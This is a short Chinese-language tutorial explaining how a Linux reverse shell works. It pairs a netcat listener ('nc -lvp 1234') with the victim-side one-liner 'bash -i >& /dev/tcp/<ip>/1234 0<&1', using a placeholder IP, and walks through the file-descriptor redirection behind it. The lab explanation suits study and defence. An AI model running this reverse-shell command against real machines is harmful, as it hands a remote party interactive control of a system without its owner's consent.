linux反弹shell>>>本质

反弹shell linux
发布日期:2019-04-27
修改时间:2019-05-12

linux反弹shell>>>本质

这次我们探究反弹shell的本质


什么反弹shell

  • 简单说就是将受害者的输出与输入全部都定向攻击者主机上

反弹shell适用怎样的情景

  • 受害者主机在内网中,ip经常变动,无法通过准确ip连接到受害者电脑
  • 受害者只能发送请求,不能接收请求
  • 等等。。。。

实验

  • 攻击者

  • centos linux

  • ip:123.456.789.0(随便写的)
  • 开放端口 1234(随便写的)

  • 受害者

  • kail linux

  • 在攻击者上执行命令

nc -lvp 1234

在这里插入图片描述

  • nc命令使用

    在这里插入图片描述 - nc -lvp 就是三个命令一起使用

  • 在受害者上执行

    linux bash -i >& /dev/tcp/123.456.789.0/1234 0<&1

    • bash -i 是指让linux产生一个交互的shell,就是可以多人使用
    • 因为linux下一切皆文件,/dev/tcp/123.456.789.0(ip)/1234 (port)指的是攻击者主机
    • >& /dev/tcp/123.456.789.0/1234 是指错误和正确输出都定向到攻击者主机,你也可以这样写 &> /dev/tcp/123.456.789.0/1234,两者意思都一样
    • 因为所有输出都在攻击的主机上,那么&1表示的攻击者的输出,0还是本机输出,0<&1就是攻击屏幕上的东西定向到受害者的输入。攻击者主机输入 abc 会输出在攻击者屏幕上,然而受害者的的输入已经定向到攻击者输入,那么攻击者的输出,就是受害者的输入,这就是反弹shell的本质
  • 攻击者回显

    • 在这里插入图片描述
    • 查看文件
    • 攻击者上查看文件 在这里插入图片描述
      • 为什么多个ls,因为攻击者的输出为受害的输入,受害者输入会正常显示在屏幕上,但受害者的输出都定向都了攻击者,所以攻击会多了个ls
    • 受害文件夹 在这里插入图片描述
  • 反弹shell已成功

总结

  • 无论代码怎么变,反弹shell的本质就是重定向